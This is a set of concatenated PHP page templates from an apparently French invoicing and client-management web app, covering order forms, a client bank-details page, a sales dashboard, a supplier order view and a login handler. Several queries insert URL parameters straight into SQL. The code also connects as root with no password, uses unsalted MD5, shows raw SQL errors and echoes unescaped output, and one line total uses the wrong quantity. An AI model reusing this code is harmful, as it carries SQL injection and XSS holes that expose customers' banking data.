<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte11" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht11" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle12" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte12" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht12" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td></td>
<td>Remise</td>
<td><input type="text" placeholder="remise" class="form-control no-boarder " name="remise" id="txtFirstName"></td>
</tr>
<tr>
<td></td>
<td>Frais de Port</td>
<td><input type="text" placeholder="Frais de Port" class="form-control no-boarder " name="port" id="txtFirstName"></td>
</tr>
<tr>
<td></td>
<td>Eco Participation</td>
<td><input type="text" placeholder="Eco-Participation" class="form-control no-boarder " name="eco-part" id="txtFirstName"></td>
</tr>
</tbody>
</table>
<center>
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</center>
</div>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/form_elements.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idclient = $_GET['idclient'];
$sql_client = mysql_query("SELECT * FROM client WHERE idclient=$idclient");
$donnee_client = mysql_fetch_array($sql_client);
$date = date("d-m-Y");
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li><p>Vous êtes Ici</p></li>
<li><a href="index.php">Client</a></li>
<li><a href="#" class="active">Fiche Client - <?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></a> </li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>Client - <span class="semi-bold">CLI000<?php echo $donnee_client['idclient']; ?> - <?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></span></h3>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Client - <span class="semi-bold">Général</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<table width="100%">
<tr>
<td width="50%">N° Client:</td>
<td width="50%">CLI000<?php echo $donnee_client['idclient']; ?></td>
</tr>
<tr>
<td width="50%">Raison social:</td>
<td width="50%"><?php echo $donnee_client['raison_social']; ?></td>
</tr>
<tr>
<td width="50%">Identité:</td>
<td width="50%"><?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></td>
</tr>
<tr>
<td>Adresse:</td>
<td>
<?php echo $donnee_client['adresse1']; ?><br>
<?php echo $donnee_client['adresse2']; ?><br>
<?php echo $donnee_client['cp']; ?> <?php echo $donnee_client['ville']; ?>
</td>
</tr>
<tr>
<td>Telephone:</td>
<td><?php echo $donnee_client['tel']; ?></td>
</tr>
<tr>
<td>Fax:</td>
<td><?php echo $donnee_client['fax']; ?></td>
</tr>
<tr>
<td>Portable:</td>
<td><?php echo $donnee_client['port']; ?></td>
</tr>
<tr>
<td>E-Mail:</td>
<td><?php echo $donnee_client['mail']; ?></td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Client - <span class="semi-bold">Finance & Paiement</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
Mode de Paiement Par default:
<br />
<h2>RIB</h2>
<table width="100%" border="2px">
<tr>
<th>Code Banque</th>
<th>Code Guichet</th>
<th>N° de Compte</th>
<th>Clé RIB</th>
</tr>
<tr>
<td><?php echo $donnee_client['code_banque']; ?></td>
<td><?php echo $donnee_client['code_guichet']; ?></td>
<td><?php echo $donnee_client['code_cpt']; ?></td>
<td><?php echo $donnee_client['cle_rib']; ?></td>
</tr>
</table>
<br />
<table width="100%" border="2px">
<tr>
<th width="70%">IBAN</th>
<th width="30%">BIC (swift)</th>
</tr>
<tr>
<td><?php echo $donnee_client['iban']; ?></td>
<td><?php echo $donnee_client['bic']; ?></td>
</tr>
</table>
<br />
<table width="100%" border="2px">
<tr>
<td>Encours:</td>
<td><?php echo $donnee_client['encour']; ?> €</td>
</tr>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<br>
<br><br>
</div>
<!-- END PAGE -->
</div>
</div>
<!-- END CHAT -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- PAGE JS -->
<script src="assets/js/tabs_accordian.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php include ('../../inc/header.php'); ?>
<?php include ('../../inc/pagecontainer.php'); ?>
<?php
// Calcule
$sql_vos_vente_total = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli WHERE iduser =" .$donnees_login['iduser']);
$donnee_vos_vente_total = mysql_fetch_row($sql_vos_vente_total);
$sql_vos_vente_aujourdhui = mysql_query("SELECT SUM(ptttc_fact_cli) as total FROM fact_cli WHERE (`iduser` = '".$donnees_login['iduser']."' AND `date_facture` = '".$date."')");
$donnee_vos_vente_aujourdui = mysql_fetch_row($sql_vos_vente_aujourdhui);
$sql_vos_vente_mois = mysql_query("SELECT SUM(ptttc_fact_cli) FROM fact_cli WHERE date_facture BETWEEN '$date_mois_deb' AND '$date_mois_fin' AND iduser = ".$donnees_login['iduser']);
$donnee_vos_vente_mois = mysql_fetch_row($sql_vos_vente_mois);
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-12">
<div class=" tiles white col-md-12 no-padding">
<div class="tiles green cover-pic-wrapper">
<div class="overlayer bottom-right">
<div class="overlayer-wrapper">
<div class="padding-10 hidden-xs">
</div>
</div>
</div>
<img src="<?php echo $rootsite; ?>assets/img/cover_pic.png" alt="">
</div>
<div class="tiles white">
<div class="row">
<div class="col-md-3 col-sm-3" >
<div class="user-profile-pic">
<img width="69" height="69" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>2x.jpg" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?><?php echo $donnees_login['prenom']; ?>.jpg" alt="">
</div>
</div>
<div class="col-md-5 user-description-box col-sm-5">
<h4 class="semi-bold no-margin"><?php echo $donnees_login['prenom']; ?> <?php echo $donnees_login['nom']; ?></h4>
<h6 class="no-margin"><?php echo $donnees_login['place']; ?> pour LSI INFORMATIQUE</h6>
<br>
<p><i class="fa fa-briefcase"></i>LSI INFORMATIQUE</p>
<p><i class="fa fa-globe"></i>www.lsiinformatique.fr</p>
<p><i class="fa fa-envelope"></i>Send Message: <EMAIL></p>
</div>
</div>
<div class="col-md-12 col-vlg-12 m-b-20 ">
<div class="tiles white added-margin">
<div class="row ">
<div class="p-t-35 p-l-45">
<div class="col-md-5 col-sm-5 no-padding">
<h5 class="no-margin">Vos Ventes totals</h5>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_total[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Aujourd'hui le <?php echo $date; ?></p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_aujourdui[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Entre le <?php echo $date_mois_deb; ?> et le <?php echo $date_mois_fin; ?>
</p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_mois[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="clearfix"></div>
</div>
</div>
<h5 class="semi-bold m-t-30 m-l-30">Dernière Ventes</h5>
<table class="table no-more-tables m-t-20 m-l-20 m-b-30">
<thead style="display:none">
<tr>
<th style="width:9%">N° Facture</th>
<th style="width:22%">Client</th>
<th style="width:6%">Montant</th>
<th style="width:1%"> </th>
</tr>
</thead>
<tbody>
<?php
$sql_derniere_facture = mysql_query("SELECT * FROM fact_cli, client WHERE fact_cli.idclient = client.idclient AND fact_cli.iduser = client.iduser");
while($donnee_derniere_facture = mysql_fetch_array($sql_derniere_facture))
{
?>
<tr>
<td class="v-align-middle bold text-success"><?php echo $donnee_derniere_facture['idfactcli']; ?></td>
<td class="v-align-middle"><span class="muted"><?php echo $donnee_derniere_facture['nom']; ?> <?php echo $donnee_derniere_facture['prenom']; ?></span> </td>
<td><span class="muted bold text-success"><?php echo $donnee_derniere_facture['ptttc_fact_cli']; ?> €</span> </td>
<td class="v-align-middle"></td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
</div>
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idcmdfour = $_GET['idcmdfour'];
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_cmd_four = mysql_query("SELECT * FROM fournisseur, cmd_four, article WHERE cmd_four.idfournisseur = fournisseur.idfournisseur AND idcmdfour=".$idcmdfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>COMMANDE</h2><b>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
<h1>
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> COMMANDE N° : </div>
<div class="pull-right"> CMDFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA COMMANDE : </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['date_cmd_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
<div class="well well-small yellow">
<div class="pull-left"> DATE DE LIVRAISON: </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['date_livraison_cmd_four']; ?> </div>
<div class="clearfix"></div>
</div>
<b>
<div class="well well-small green">
<div class="pull-left"> MONTANT TOTAL DE LA COMMANDE: </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['ptttc_cmd_four']; ?> EUR </div>
<div class="clearfix"></div>
</div>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
<th style="width:140px" class="text-right">Prix Unitaire HT</th>
<th style="width:90px" class="text-right">Total HT</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_cmd_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art1']; ?></td>
<td><?php echo $donnee_cmd_four['qte1']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht1']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht1'] * $donnee_cmd_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art2']; ?></td>
<td><?php echo $donnee_cmd_four['qte2']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht2']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht2'] * $donnee_cmd_four['qte2']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art3']; ?></td>
<td><?php echo $donnee_cmd_four['qte3']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht3']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht3'] * $donnee_cmd_four['qte3']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art4']; ?></td>
<td><?php echo $donnee_cmd_four['qte4']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht4']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht4'] * $donnee_cmd_four['qte4']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art5']; ?></td>
<td><?php echo $donnee_cmd_four['qte5']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht5']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht5'] * $donnee_cmd_four['qte5']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art6']; ?></td>
<td><?php echo $donnee_cmd_four['qte6']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht6']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht6'] * $donnee_cmd_four['qte6']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art7']; ?></td>
<td><?php echo $donnee_cmd_four['qte7']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht7']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht7'] * $donnee_cmd_four['qte7']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art8']; ?></td>
<td><?php echo $donnee_cmd_four['qte8']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht8']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht8'] * $donnee_cmd_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art9']; ?></td>
<td><?php echo $donnee_cmd_four['qte9']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht9']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht9'] * $donnee_cmd_four['qte9']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art10']; ?></td>
<td><?php echo $donnee_cmd_four['qte10']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht10']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht10'] * $donnee_cmd_four['qte10']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art11']; ?></td>
<td><?php echo $donnee_cmd_four['qte11']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht11']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht11'] * $donnee_cmd_four['qte11']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art12']; ?></td>
<td><?php echo $donnee_cmd_four['qte12']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht12']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht12'] * $donnee_cmd_four['qte12']; ?> €</td>
</tr>
<?php } ?><br><br><br><br>
<tr></tr>
<tr>
<td colspan="2" rowspan="4" ><h4 class="semi-bold"></h4>
<p></p>
<h5 class="text-right semi-bold"></h5></td>
<td class="text-right"><strong>Frais de Port</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['port']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Remise</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['remise']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total HT</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['ptht_cmd_four']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total TVA</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['taxe_cmd_four']; ?> €</td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><div class="well well-small green"><strong>Total TTC</strong></div></td>
<td class="text-right"><strong><?php echo $donnee_cmd_four['ptttc_cmd_four']; ?> €</strong></td>
</tr>
</tbody>
</table>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.commande.php?idcmdfour=<?php echo $donnee_cmd_four['idcmdfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<button class="btn btn-danger" type="button" data-target="#transfere" data-toggle="modal"><i class="fa fa-exchange"></i></button>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer Cette Commande en Bon de Livraison ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<p><h3>Transfere de la Commande <b>N°CMDFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?></b> vers Bon de Reception <b>N° RECFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?></b> en cours...</h3></p>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.commande.php?idcmdfour=<?php echo $donnee_cmd_four['idcmdfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep> <?php
// on teste si le visiteur a soumis le formulaire de connexion
if (isset($_POST['connexion']) && $_POST['connexion'] == 'Connexion') {
if ((isset($_POST['login']) && !empty($_POST['login'])) && (isset($_POST['pass']) && !empty($_POST['pass']))) {
$base = mysql_connect ('localhost', 'root', '');
mysql_select_db ('gestion', $base);
// on teste si une entrée de la base contient ce couple login / pass
$sql = 'SELECT count(*) FROM membre WHERE login="'.mysql_real_escape_string($_POST['login']).'" AND pass_md5="'.mysql_real_escape_string(md5($_POST['pass'])).'"';
$req = mysql_query($sql) or die('Erreur SQL !<br />'.$sql.'<br />'.mysql_error());
$data = mysql_fetch_array($req);
mysql_free_result($req);
mysql_close();
// si on obtient une réponse, alors l'utilisateur est un membre
if ($data[0] == 1) {
session_start();
$_SESSION['login'] = $_POST['login'];
header('Location: index.php');
exit();
}
// si on ne trouve aucune réponse, le visiteur s'est trompé soit dans son login, soit dans son mot de passe
elseif ($data[0] == 0) {
$erreur = "<div class=messenger-message message alert error message-error alert-error messenger-will-hide-after>
<button data-dismiss=alert class=messenger-close type=button>×</button>
